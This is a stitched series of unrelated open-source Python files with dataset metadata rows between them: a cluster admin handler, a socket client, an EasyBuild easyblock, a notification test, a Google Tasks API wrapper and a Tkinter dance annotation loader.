node_filter = lambda n: n.getType() is node_type
logging.info("ask list of %s nodes", node_type)
node_list = self.app.nm.getList(node_filter)
node_information_list = [node.asTuple() for node in node_list ]
p = Packets.AnswerNodeList(node_information_list)
conn.answer(p)
@check_primary_master
def askClusterState(self, conn):
conn.answer(Packets.AnswerClusterState(self.app.cluster_state))
@check_primary_master
def askPrimary(self, conn):
master_node = self.app.master_node
conn.answer(Packets.AnswerPrimary(master_node.getUUID()))
askLastIDs = forward_ask(Packets.AskLastIDs)
askLastTransaction = forward_ask(Packets.AskLastTransaction)
addPendingNodes = forward_ask(Packets.AddPendingNodes)
askRecovery = forward_ask(Packets.AskRecovery)
tweakPartitionTable = forward_ask(Packets.TweakPartitionTable)
setClusterState = forward_ask(Packets.SetClusterState)
setNodeState = forward_ask(Packets.SetNodeState)
checkReplicas = forward_ask(Packets.CheckReplicas)
truncate = forward_ask(Packets.Truncate)
class MasterEventHandler(EventHandler):
""" This class is just used to dispacth message to right handler"""
def _connectionLost(self, conn):
app = self.app
if app.listening_conn: # if running
assert app.master_conn in (conn, None)
conn.cancelRequests("connection to master lost")
app.reset()
app.uuid = None
raise PrimaryFailure
def connectionFailed(self, conn):
self._connectionLost(conn)
def connectionClosed(self, conn):
self._connectionLost(conn)
def dispatch(self, conn, packet, kw={}):
if 'conn' in kw:
# expected answer
if packet.isResponse():
packet.setId(kw['msg_id'])
kw['conn'].answer(packet)
else:
self.app.request_handler.dispatch(conn, packet, kw)
else:
# unexpected answers and notifications
super(MasterEventHandler, self).dispatch(conn, packet, kw)
def answerClusterState(self, conn, state):
self.app.cluster_state = state
def answerNodeInformation(self, conn):
# XXX: This will no more exists when the initialization module will be
# implemented for factorize code (as done for bootstrap)
logging.debug("answerNodeInformation")
def notifyPartitionChanges(self, conn, ptid, cell_list):
self.app.pt.update(ptid, cell_list, self.app.nm)
def answerPartitionTable(self, conn, ptid, row_list):
self.app.pt.load(ptid, row_list, self.app.nm)
self.app.bootstrapped = True
def sendPartitionTable(self, conn, ptid, row_list):
if self.app.bootstrapped:
self.app.pt.load(ptid, row_list, self.app.nm)
def notifyClusterInformation(self, conn, cluster_state):
self.app.cluster_state = cluster_state
def notifyNodeInformation(self, conn, node_list):
self.app.nm.update(node_list)
class MasterRequestEventHandler(EventHandler):
""" This class handle all answer from primary master node"""
# XXX: to be deleted ?
| gpl-2.0 | 7,400,558,522,298,591,000 | 37.308271 | 78 | 0.671443 | false |
Maslor/freshman-berries | FreshmanClientV8.py | 1 | 1046 | # -*- encoding: latin1 -*-
#FRESHMAN BERRIES
#Cliente
#Version: 8.1
#Author: NEETI
import socket
def enviar( mensagem ):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servidor=('neetiproj.tagus.ist.utl.pt', 4000)
sock.connect( servidor )
mensagens = []
try:
msg = mensagem.encode('latin1')
sock.sendall( msg )
if ( mensagem[:2] == "/r" ):
while True:
data = sock.recv(2048)
data = data.decode('latin1')
if ( data is not None ):
mensagens.append(data)
break;
finally:
sock.close()
return mensagens
def menu():
a = None
while ( a is not "/x" ):
a = str(input(": "))
d = enviar(a)
if ( d is not None ):
for m in d:
print(m)
''' try:
menu()
except Exception as ex:
print (ex)
input() ''' | gpl-2.0 | -5,482,627,804,460,246,000 | 21.288889 | 60 | 0.441683 | false |
boegel/easybuild-easyblocks | easybuild/easyblocks/m/mtl4.py | 1 | 1877 | ##
# Copyright 2009-2020 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for MTL4, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
import os
from easybuild.easyblocks.generic.tarball import Tarball
class EB_MTL4(Tarball):
"""Support for installing MTL4."""
def sanity_check_step(self):
"""Custom sanity check for MTL4."""
incpref = os.path.join('include', 'boost', 'numeric')
custom_paths = {
'files': [],
'dirs': [os.path.join(incpref, x) for x in ["itl", "linear_algebra", "meta_math", "mtl"]],
}
super(EB_MTL4, self).sanity_check_step(custom_paths=custom_paths)
def make_module_req_guess(self):
"""Adjust CPATH for MTL4."""
guesses = super(EB_MTL4, self).make_module_req_guess()
guesses.update({'CPATH': 'include'})
return guesses
| gpl-2.0 | -2,865,124,163,492,093,400 | 32.517857 | 102 | 0.689398 | false |
prasannav7/ggrc-core | test/integration/ggrc_workflows/notifications/test_recurring_cycles.py | 1 | 3523 | # Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
from integration.ggrc import TestCase
from freezegun import freeze_time
from mock import patch
from ggrc.notifications import common
from ggrc.models import Person
from integration.ggrc_workflows.generator import WorkflowsGenerator
from integration.ggrc.api_helper import Api
from integration.ggrc.generator import ObjectGenerator
class TestRecurringCycleNotifications(TestCase):
def setUp(self):
TestCase.setUp(self)
self.api = Api()
self.generator = WorkflowsGenerator()
self.object_generator = ObjectGenerator()
_, self.assignee = self.object_generator.generate_person(
user_role="gGRC Admin")
self.create_test_cases()
def tearDown(self):
pass
def test_cycle_starts_in_less_than_X_days(self):
with freeze_time("2015-02-01"):
_, wf = self.generator.generate_workflow(self.quarterly_wf_1)
response, wf = self.generator.activate_workflow(wf)
self.assert200(response)
assignee = Person.query.get(self.assignee.id)
with freeze_time("2015-01-01"):
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
with freeze_time("2015-01-29"):
_, notif_data = common.get_todays_notifications()
self.assertIn(assignee.email, notif_data)
with freeze_time("2015-02-01"):
_, notif_data = common.get_todays_notifications()
self.assertIn(assignee.email, notif_data)
# TODO: this should mock google email api.
@patch("ggrc.notifications.common.send_email")
def test_marking_sent_notifications(self, mail_mock):
mail_mock.return_value = True
with freeze_time("2015-02-01"):
_, wf = self.generator.generate_workflow(self.quarterly_wf_1)
response, wf = self.generator.activate_workflow(wf)
self.assert200(response)
assignee = Person.query.get(self.assignee.id)
with freeze_time("2015-01-01"):
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
with freeze_time("2015-01-29"):
common.send_todays_digest_notifications()
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
with freeze_time("2015-02-01"):
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
def create_test_cases(self):
def person_dict(person_id):
return {
"href": "/api/people/%d" % person_id,
"id": person_id,
"type": "Person"
}
self.quarterly_wf_1 = {
"title": "quarterly wf 1",
"description": "",
"owners": [person_dict(self.assignee.id)],
"frequency": "quarterly",
"notify_on_change": True,
"task_groups": [{
"title": "tg_1",
"contact": person_dict(self.assignee.id),
"task_group_tasks": [{
"contact": person_dict(self.assignee.id),
"description": self.generator.random_str(100),
"relative_start_day": 5,
"relative_start_month": 2,
"relative_end_day": 25,
"relative_end_month": 2,
},
],
},
]
}
self.all_workflows = [
self.quarterly_wf_1,
]
| apache-2.0 | -6,311,678,311,958,132,000 | 29.903509 | 78 | 0.642066 | false |
christopherjbly/tasks-indicator | src/googletasksapi.py | 1 | 18600 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
#
#
# googletasksapi.py
#
# Copyright (C) 2011 Lorenzo Carbonell
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
#
from services import GoogleService
from logindialog import LoginDialog
from urllib.parse import urlencode, quote
import os
import json
import io
import comun
import datetime
import time
import uuid
import rfc3339
'''
Dependencies:
python-gflags
'''
OAUTH2_URL = 'https://accounts.google.com/o/oauth2/'
AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'
TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
REDIRECT_URI = 'http://localhost'
APIKEY = 'AIzaSyDZjnvnk8IBZMUvleSSfGWNnktdKLiKlL0'
CLIENT_ID='197445608333-fd998ofp2ivpj090oputel25imtp7ptk.apps.googleusercontent.com'
CLIENT_SECRET='5So18nKZnWZsKGzOG0pmJUWh'
SCOPE='https://www.googleapis.com/auth/tasks'
class Task(dict):
def __init__(self,entry=None):
thetime = datetime.datetime.now()
position = str(int(time.mktime(thetime.timetuple())))
if len(position)<20:
position = '0'*(20-len(position))+position
self['kind'] = "tasks#task"
self['id'] = str(uuid.uuid4())
self['title'] = None
self['updated'] = rfc3339.rfc3339(thetime)
self['selfLink'] = None
self['parent'] = None
self['position'] = position
self['notes'] = None
self['status'] = 'needsAction'
self['due'] = None
self['completed'] = None
self['deleted'] = False
self['hidden'] = False
self['links'] = []
self['tasklist_id'] = None
self['sync'] = False
self.set_from_entry(entry)
def set_due(self,due):
self['due'] = rfc3339.rfc3339(due)
def get_completed(self):
return (self['status'] == 'completed')
def set_completed(self,iscompleted = True):
if iscompleted:
self['status'] = 'completed'
self['completed'] = rfc3339.rfc3339(datetime.datetime.now())
else:
self['status'] = 'needsAction'
self['completed'] = None
def set_from_entry(self,entry):
if entry is not None:
self.update(entry)
def __str__(self):
ans = ''
for key in self.keys():
ans += '%s: %s\n'%(key,self[key])
return ans
def get_position(self):
if 'position' in self.keys():
return(self['position'])
return None
def __eq__(self,other):
for key in self.keys():
if key is not None and other is not None and key in other.keys():
if self[key] != other[key]:
return False
else:
return False
return True
def __ne__(self,other):
return not self.__eq__(other)
def __lt__(self,other):
return self.get_position() < other.get_position()
def __le__(self,other):
return self.get_position() <= other.get_position()
def __gt__(self,other):
return self.get_position() > other.get_position()
def __ge__(self,other):
return self.get_position() >= other.get_position()
class TaskList(dict):
def __init__(self,entry=None):
self['kind'] = "tasks#taskList"
self['id'] = str(uuid.uuid4())
self['title'] = None
self['updated'] = rfc3339.rfc3339(datetime.datetime.now())
self['selfLink'] = None
self['tasks'] = {}
self.set_from_entry(entry)
def set_from_entry(self,entry):
if entry is not None:
self['kind'] = entry['kind'] if 'kind' in entry.keys() else None
self['id'] = entry['id'] if 'id' in entry.keys() else None
self['title'] = entry['title'] if 'title' in entry.keys() else None
self['updated'] = entry['updated'] if 'updated' in entry.keys() else None
self['selfLink'] = entry['selfLink'] if 'selfLink' in entry.keys() else None
self['tasks'] = {}
print('aqui')
if 'tasks' in entry.keys():
for atask_value in entry['tasks'].values():
atask = Task(atask_value)
self['tasks'][atask['id']] = atask
def set_tasks(self,tasks):
self['tasks'] = tasks
def __str__(self):
ans = ''
for key in self.keys():
ans += '%s: %s\n'%(key,self[key])
return ans
class TaskAlone(object):
def __init__(self):
self.tasklists = {}
def backup(self):
f = open(comun.BACKUP_FILE,'w')
f.write(json.dumps(self.tasklists, sort_keys = True, indent = 4))
f.close()
def create_tasklist(self,title):
tasklist = TaskList()
tasklist['title'] = title
self.tasklists[tasklist['id']] = tasklist
return tasklist
def edit_tasklist(self,tasklist):
self.tasklists[tasklist['id']] = tasklist
return tasklist
def remove_tasklist(self,tasklist):
del self.tasklists[tasklist['id']]
def create_task(self,atasklist,title):
atask = Task()
atask['title'] = title
atask['tasklist_id'] = atasklist['id']
self.tasklists[atasklist['id']]['tasks'][atask['id']] = atask
return atask
def edit_task(self,task):
self.tasklists[task['tasklist_id']]['tasks'][task['id']] = task
return task
def remove_task(self,task):
del self.tasklists[task['tasklist_id']]['tasks'][task['id']]
def move_tasks(self,first_task,last_task):
temporal_position = first_task['position']
first_task['position'] = last_task['position']
last_task['position'] = temporal_position
def move_task_first(self,atask,tasklist_id=None):
tasks = self.get_tasks(tasklist_id)
if len(tasks)>0:
self.move_tasks(atask,tasks[0])
def get_tasklists(self):
return self.tasklists.values()
def get_tasks(self,tasklist_id = None):
tasks = []
if tasklist_id is None:
for tasklist in self.tasklists.values():
tasks.extend(tasklist['tasks'].values())
else:
if tasklist_id in self.tasklists.keys():
tasks = self.tasklists[tasklist_id]['tasks'].values()
return sorted(tasks)
def clear_completed_tasks(self,tasklist_id = None):
for task in self.get_tasks(tasklist_id = tasklist_id):
if task['status'] == 'completed':
self.remove_task(task)
def restore(self):
if os.path.exists(comun.BACKUP_FILE):
f = open(comun.BACKUP_FILE,'r')
data = f.read()
f.close()
midata = json.loads(data)
self.tasklists = {}
for tasklist_value in midata.values():
atasklist = TaskList(tasklist_value)
self.tasklists[atasklist['id']] = atasklist
else:
self.tasklists = {}
class GTAService(GoogleService):
def __init__(self,token_file):
GoogleService.__init__(self,auth_url=AUTH_URL,token_url=TOKEN_URL,redirect_uri=REDIRECT_URI,scope=SCOPE,client_id=CLIENT_ID,client_secret=CLIENT_SECRET,token_file=comun.TOKEN_FILE)
self.tasklists = {}
def read(self):
for atasklist in self._get_tasklists().values():
atasklist['tasks'] = self._get_tasks(atasklist['id'])
self.tasklists[atasklist['id']] = atasklist
def backup(self):
f = open(comun.BACKUP_FILE,'w')
f.write(json.dumps(self.tasklists, sort_keys = True, indent = 4))
f.close()
def restore(self):
f = open(comun.BACKUP_FILE,'r')
data = f.read()
f.close()
midata = json.loads(data)
self.tasklists = {}
for tasklist_value in midata.values():
atasklist = TaskList(tasklist_value)
tasks = {}
for task_value in atasklist['tasks'].values():
atask = Task(task_value)
tasks[atask['id']] = atask
atasklist['tasks'] = tasks
self.tasklists[atasklist['id']] = atasklist
def __do_request(self,method,url,addheaders=None,data=None,params=None,first=True):
headers ={'Authorization':'OAuth %s'%self.access_token}
if addheaders:
headers.update(addheaders)
print(headers)
if data:
if params:
response = self.session.request(method,url,data=data,headers=headers,params=params)
else:
response = self.session.request(method,url,data=data,headers=headers)
else:
if params:
response = self.session.request(method,url,headers=headers,params=params)
else:
response = self.session.request(method,url,headers=headers)
print(response)
if response.status_code == 200 or response.status_code == 201 or response.status_code == 204:
return response
elif (response.status_code == 401 or response.status_code == 403) and first:
ans = self.do_refresh_authorization()
print(ans)
if ans:
return self.__do_request(method,url,addheaders,data,params,first=False)
return None
def _get_tasklists(self):
tasklists = {}
params = {'maxResults':1000000}
response = self.__do_request('GET','https://www.googleapis.com/tasks/v1/users/@me/lists',params=params)
if response and response.text:
try:
answer = json.loads(response.text)
if 'items' in answer.keys():
for item in answer['items']:
atasklist = TaskList(item)
tasklists[atasklist['id']] = atasklist
except:
pass
return tasklists
def _add_tasklist(self,title):
url = 'https://www.googleapis.com/tasks/v1/users/@me/lists'
data = {'kind': 'tasks#taskList','title':title}
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('POST',url,addheaders=addheaders,data = body)
if response and response.text:
try:
ans = json.loads(response.text)
print(ans)
return TaskList(ans)
except Exception as e:
print(e)
return None
def _edit_tasklist(self,tasklist_id, title):
params = {'tasklist':tasklist_id}
url = 'https://www.googleapis.com/tasks/v1/users/@me/lists/%s'%(tasklist_id)
data = {
'title':title
}
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('PATCH',url,addheaders=addheaders,params=params,data = body)
if response and response.text:
try:
atasklist = TaskList(json.loads(response.text))
except Exception as e:
print(e)
return None
def _delete_tasklist(self,tasklist):
url = 'https://www.googleapis.com/tasks/v1/users/@me/lists/%s'%(tasklist['id'])
params = {'tasklist':tasklist['id']}
response = self.__do_request('DELETE',url,params = params)
if response and response.text:
try:
return True
except Exception as e:
print(e)
return False
def _get_tasks(self,tasklist_id = '@default'):
tasks = {}
params = {'tasklist':tasklist_id,'maxResults':1000000}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks'%(tasklist_id)
response = self.__do_request('GET',url,params=params)
if response and response.text:
try:
answer = json.loads(response.text)
if 'items' in answer.keys():
for item in answer['items']:
atask = Task(item)
atask['tasklist_id'] = tasklist_id
tasks[atask['id']] = atask
except:
pass
return tasks
def _clear_completed_tasks(self,tasklist_id = '@default'):
params = {'tasklist':tasklist_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/clear'%(tasklist_id)
addheaders={'Content-Length':'0'}
response = self.__do_request('POST',url,params=params,addheaders=addheaders)
if response is not None:
try:
return True
except Exception as e:
print(e)
return False
def _delete_task(self,tasklist_id,task_id):
params = {'tasklist':tasklist_id,'task':task_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks/%s'%(tasklist_id,task_id)
response = self.__do_request('DELETE',url,params=params)
if response and response.text:
try:
return True
except Exception as e:
print(e)
return False
def _edit_task(self,tasklist_id,task_id, title,notes=None, iscompleted=False, due=None, data_completed=None,deleted=False):
params = {'tasklist':tasklist_id,'task':task_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks/%s'%(tasklist_id,task_id)
data = {
'kind': 'tasks#task',
'title':title,
'deleted':deleted
}
if notes is not None:
data['notes'] = notes
if iscompleted:
data['status'] = 'completed'
if data_completed is not None:
data['completed'] = rfc3339.rfc3339(data_completed)
else:
data['completed'] = rfc3339.rfc3339(datetime.datetime.now())
else:
data['status'] = 'needsAction'
data['completed'] = None
if due is not None:
data['due'] = rfc3339.rfc3339(due)
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('PATCH',url,addheaders=addheaders,params=params,data = body)
if response and response.text:
try:
atask = Task(json.loads(response.text))
atask['tasklist_id'] = tasklist_id
return atask
except Exception as e:
print(e)
return None
def _move_task(self,tasklist_id,task_id,parent_id=None,previous_id=None):
params = {'tasklist':tasklist_id,'task':task_id}
if parent_id is not None:
params['parent'] = parent_id
if previous_id is not None:
params['previous'] = previous_id
addheaders={'Content-Length':'0'}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks/%s/move'%(tasklist_id,task_id)
response = self.__do_request('POST',url,params=params,addheaders=addheaders)
if response and response.text:
try:
atask = Task(json.loads(response.text))
atask['tasklist_id'] = tasklist_id
return atask
except Exception as e:
print(e)
return None
def _add_task(self,tasklist_id,title,notes=None, iscompleted=False, due=None, data_completed=None,deleted=False):
params = {'tasklist':tasklist_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks'%(tasklist_id)
data = {
'kind': 'tasks#task',
'title':title,
'deleted':deleted
}
if notes is not None:
data['notes'] = notes
if iscompleted:
data['status'] = 'completed'
if data_completed is not None:
data['completed'] = rfc3339.rfc3339(data_completed)
else:
data['completed'] = rfc3339.rfc3339(datetime.datetime.now())
else:
data['status'] = 'needsAction'
data['completed'] = None
if due is not None:
data['due'] = rfc3339.rfc3339(due)
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('POST',url,addheaders=addheaders,params=params,data = body)
if response and response.text:
try:
atask = Task(json.loads(response.text))
atask['tasklist_id'] = tasklist_id
return atask
except Exception as e:
print(e)
return None
def get_tasklists(self):
tasklists = self._get_tasklists()
return tasklists
def create_tasklist(self,title):
return self._add_tasklist(title)
def update_tasklist(self, tasklist):
return self._edit_tasklist(tasklist)
def delete_tasklist(self,tasklist):
return self._delete_tasklist(tasklist)
def clear_completed_tasks(self,tasklist_id = '@default'):
return self._clear_completed_tasks(tasklist_id = tasklist_id)
def get_tasks(self, tasklist_id = '@default'):
tasks = {}
if tasklist_id is None:
for atasklist in self._get_tasklists().values():
for task in self._get_tasks(atasklist['id']).values():
tasks[task['id']] = task
else:
tasks = self._get_tasks(tasklist_id)
return tasks
def create_task(self, tasklist_id = '@default', title = '', notes=None, iscompleted=False, due=None, data_completed=None,deleted=False):
atask = self._add_task(tasklist_id,title,notes=notes, iscompleted=iscompleted, due=due, data_completed=data_completed,deleted=deleted)
return atask
def move_task(self, task_id, previous_task_id,tasklist_id = '@default'):
return self._move_task(tasklist_id,task_id,previous_id=previous_task_id)
def move_task_first(self,task_id, tasklist_id = '@default'):
return self._move_task(tasklist_id,task_id)
def edit_tasklist(self, tasklist_id, title):
return self._edit_tasklist(tasklist_id,title)
def edit_task(self, task_id, tasklist_id = '@default', title = None, notes = None, iscompleted = False, due = None):
return self._edit_task(tasklist_id,task_id,title,notes,iscompleted)
def delete_task(self, task_id, tasklist_id = '@default'):
return self._delete_task(tasklist_id,task_id)
if __name__ == '__main__':
ta = TaskAlone()
ta.restore()
print(ta.tasklists)
#tasklist = ta.tasklists['398cecc5-a699-4b4d-94da-5c856244d04c']
#task = ta.create_task(tasklist,'otra prueba')
'''
print(ta.tasklists)
tasklist = ta.tasklists['398cecc5-a699-4b4d-94da-5c856244d04c']
tasklist = ta.create_tasklist('lista de prueba')
print(tasklist)
task = ta.create_task(tasklist,'prueba')
print(task)
print(tasklist)
print(ta.tasklists)
'''
'''
tasklist = ta.create_tasklist('prueba')
print(tasklist)
task = ta.create_task(tasklist,'prueba')
print(task)
print(tasklist)
task['title'] = 'La tarea de la lista'
print(tasklist)
'''
ta.backup()
'''
gta = GTAService(token_file = comun.TOKEN_FILE)
#gc = GoogleCalendar(token_file = comun.TOKEN_FILE)
print(gta.do_refresh_authorization())
if gta.access_token is None or gta.refresh_token is None:
authorize_url = gta.get_authorize_url()
print(authorize_url)
ld = LoginDialog(authorize_url)
ld.run()
temporary_token = ld.code
ld.destroy()
print(temporary_token)
print(gta.get_authorization(temporary_token))
print(gta.get_tasklists())
#print(gta.create_tasklist('Una lista de ejemplo'))
#print(gta.get_tasks())
print'#############################################################'
print(gta.clear_completed_tasks('@default'))
print'#############################################################'
atask = (gta.create_task(tasklist_id='MDU4MDg5OTIxODI5ODgyMTE0MTg6MTA2NTc3MDc0Mzow',title='prueba'))
print'#############################################################'
print(atask)
print'#############################################################'
gta.move_task_first(atask['id'],atask['tasklist_id'])
gta.read()
atask = gta.edit_task(atask['id'],atask['tasklist_id'],title='otra prueba')
print(atask)
'''
'''
for tasklist in gta.get_tasklists():
print '########################################################'
print tasklist
for task in gta.get_tasks(tasklist_id = tasklist['id']):
print task
'''
'''
for tasklist in gta.get_tasklists():
print tasklist
#print gta.create_tasklist('desde ubuntu')
#print gta.get_tasklist('MDU4MDg5OTIxODI5ODgyMTE0MTg6MDow')
print gta.get_tasks()
for task in gta.get_tasks():
print '%s -> %s'%(task['title'],task['id'])
#print gta.create_task(title = 'prueba2 desde ubuntu',notes = 'primera prueba')
gta.move_task_first('MDU4MDg5OTIxODI5ODgyMTE0MTg6MDoy')
'''
| gpl-3.0 | -4,239,862,703,708,010,500 | 30.260504 | 182 | 0.671075 | false |
MKLab-ITI/DanceAnno | DanceAnno_Loader.py | 1 | 20273 | # This class loads the data
# 1. Skeleton (.skel or .mat)
# 2. Video (a folder with frames XXXXXX_[index].png or .jpg or .jpeg
# if you have actual video you can use ffmpeg to split it.
# 3. Choreography (.svl)
# 4. Music beats (.txt)
import os
import DanceAnno_Application
__author__ = 'DIMITRIOS'
from tkinter import *
from tkinter import ttk # ttk is a little more beautiful than tk.
from tkinter.filedialog import askopenfilename, askdirectory
from tkinter.messagebox import showerror
from tkinter import messagebox
sys.path.append( os.path.join('.', 'Utils' ))
import readsvl # function to read svls
import readtxt # function to read txts
import readskel # function to read body skeleton trajectories
# if PyCharm underlines them with red, just ignore (alt+enter -> ignore)
class Loader:
def __init__(self):
# This variable will automatic drive the folders selection and it will shorten your clicks
self.debug_FLAG = False
self.db = 'salsa' # salsa or calus
self.debug_fastaccess = 'bertrand_c3_t1'
# Are the data loaded ?
self.skeletonLoadedFlag = False
self.videoLoadedFlag = False
self.choreoLoadedFlag = False
# GUI init
self.root = Tk()
self.root.configure(background='#000')
self.root.title("Dance Annotator")
# ask for permission to close window
self.root.protocol("WM_DELETE_WINDOW", self.close_window)
# Window initial dimensions
w = 900 # The value of the width
h = 300 # The value of the height of the window
# Your screen width and height
ws = self.root.winfo_screenwidth()
hs = self.root.winfo_screenheight()
# Top left corner of the window
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
self.root.geometry('%dx%d+%d+%d' % (w, h, x, y))
# Data
# Sampling rate of Kinect
self.Fs = 0
# Length of the Kinect signals
self.length_signal_samples = 0
# Number of music beats (optional)
self.nBeats = 0
# Store the index of Video frames (XXXXXXX_[index].jpg)
self.indexFrames = []
self.dname = "" # directory where video frames are located
self.prefixname = "" # the part before underscore of XXXXX_[index].jpg
self.annotationSecs = [] # First level annotation
self.labels = {}
self.annotationSecsB = [] # Second level annotation
self.labelsB = {}
self.beats = {} # Beats indicators
# Vars to indicate the parsing status of each file
self.skeletonStatusSTR = StringVar()
self.skeletonStatusSTR.set("Empty")
self.videoStatusSTR = StringVar()
self.videoStatusSTR.set("Empty")
self.choreoStatusSTR = StringVar()
self.choreoStatusSTR.set("Empty")
self.mbeatsStatusSTR = StringVar()
self.mbeatsStatusSTR.set("Empty")
# Start the GUI design
# Coloring style for ttk
style = ttk.Style()
style.configure("BW.TFrame", foreground="black", background="white")
style.configure("BW.TLabel", foreground="black", background="white")
style.configure("BW.TCheckbutton", foreground="black", background="white")
# Frame containing the loading functionalities
self.fr_filedialog = ttk.Frame(self.root, style="BW.TFrame")
# Frame containing the GUI navigation processes (Continue or Exit)
self.fr_exitcontinue = ttk.Frame(self.root, style="BW.TFrame")
# Just some text to explain what we are doing
self.lbl_explain = ttk.Label(self.fr_filedialog, text="Select the resources to annotate", style="BW.TLabel")
# --- FILE SELECTION WIDGETS ----
# 1 SKELETON
self.lbl_namelbl_mat_skeleton = ttk.Label(self.fr_filedialog, text="Skeleton Data", style="BW.TLabel")
self.entry_name_mat = Entry(self.fr_filedialog)
self.bt_mat_load = Button(self.fr_filedialog, text="...", command=self.loadSkeletonData)
self.lbl_namelbl_hint_skeleton = ttk.Label(self.fr_filedialog, text=".mat or .skel", style="BW.TLabel")
self.lbl_namelbl_status_skeleton = ttk.Label(self.fr_filedialog, textvariable=self.skeletonStatusSTR, style="BW.TLabel")
#self.separatorBtSkel = ttk.Separator(self.fr_filedialog,orient=VERTICAL)
# 2 VIDEO FRAMES
self.lbl_namelbl_frames_video = ttk.Label(self.fr_filedialog, text="Folder with frame data", style="BW.TLabel")
self.entry_name_frames = Entry(self.fr_filedialog)
self.bt_frames = Button(self.fr_filedialog, text="...", command= self.loadFramesByDirectory)
self.lbl_namelbl_hint_video = ttk.Label(self.fr_filedialog, text="A folder with jpeg, jpg, or png files", style="BW.TLabel")
self.lbl_namelbl_status_video = ttk.Label(self.fr_filedialog, textvariable=self.videoStatusSTR, style="BW.TLabel")
#self.separatorFramesVideo = ttk.Separator(self.fr_filedialog,orient=VERTICAL)
# 3 CHOREOGRAPHY
self.lbl_load_choreo = ttk.Label(self.fr_filedialog, text="Load existing choreography (Optional)", style="BW.TLabel")
self.entry_name_choreo = Entry(self.fr_filedialog)
self.bt_load_ch = Button(self.fr_filedialog, text="...", command= self.loadChoreography)
self.lbl_namelbl_hint_choreo = ttk.Label(self.fr_filedialog, text="Provide an existing .txt otherwise a new one will be created", style="BW.TLabel" )
self.lbl_namelbl_status_choreo = ttk.Label(self.fr_filedialog, textvariable=self.choreoStatusSTR, style="BW.TLabel")
# 4 Music beats
self.lbl_load_mbeats = ttk.Label(self.fr_filedialog, text="Load music beats (Optional)", style="BW.TLabel")
self.entry_name_mbeats = Entry(self.fr_filedialog)
self.bt_load_mbeats = Button(self.fr_filedialog, text="...", command= self.loadMusicBeats)
self.lbl_namelbl_hint_mbeats = ttk.Label(self.fr_filedialog, text="Music beats in .txt format", style="BW.TLabel")
self.lbl_namelbl_status_mbeats = ttk.Label(self.fr_filedialog, textvariable=self.mbeatsStatusSTR, style="BW.TLabel")
self.bt_continue = Button(self.fr_exitcontinue, text="Continue", command=self.StartAnno, state = DISABLED)
self.bt_exit = Button(self.fr_exitcontinue, text="Exit", command=self.close_window)
# --- PLACEMENT OF WIDGETs IN THE ROOT WINDOW -------
self.fr_filedialog.grid(row=0, column=0, columnspan=4, sticky=(N, S, E, W), padx=5)
self.fr_exitcontinue.grid(row=1, column=0, columnspan=4, sticky=(E), ipadx=50, padx=5)
# Explanation
self.lbl_explain.grid(row=0, column=0, columnspan=4, rowspan=1, sticky=(E,W), padx=5)
# Labels
self.lbl_namelbl_mat_skeleton.grid(column=0, sticky=(W), row=1, columnspan=1, rowspan=1, pady=5, padx=5)
self.entry_name_mat.grid(column=1, sticky=(N, S, E, W), row=1, columnspan=1, rowspan=1, pady=5, padx=5)
self.bt_mat_load.grid(column=2, sticky=(N, S, E, W), row=1, columnspan=1, rowspan=1, pady=5, padx=5)
self.lbl_namelbl_hint_skeleton.grid(column=3, sticky=(W), row=1, columnspan=1, rowspan=1, padx=5)
self.lbl_namelbl_status_skeleton.grid(column=4, sticky=(W), row=1, columnspan=1, rowspan=1, padx=5)
#self.separatorBtSkel.pack(side="left", fill=Y, padx=5)
self.lbl_namelbl_frames_video.grid(row=2, column=0, columnspan=1, rowspan=1, sticky=(W), padx=5)
self.entry_name_frames.grid(row=2, column=1, columnspan=1, rowspan=1, sticky=(N, S, E, W), pady=5, padx=5)
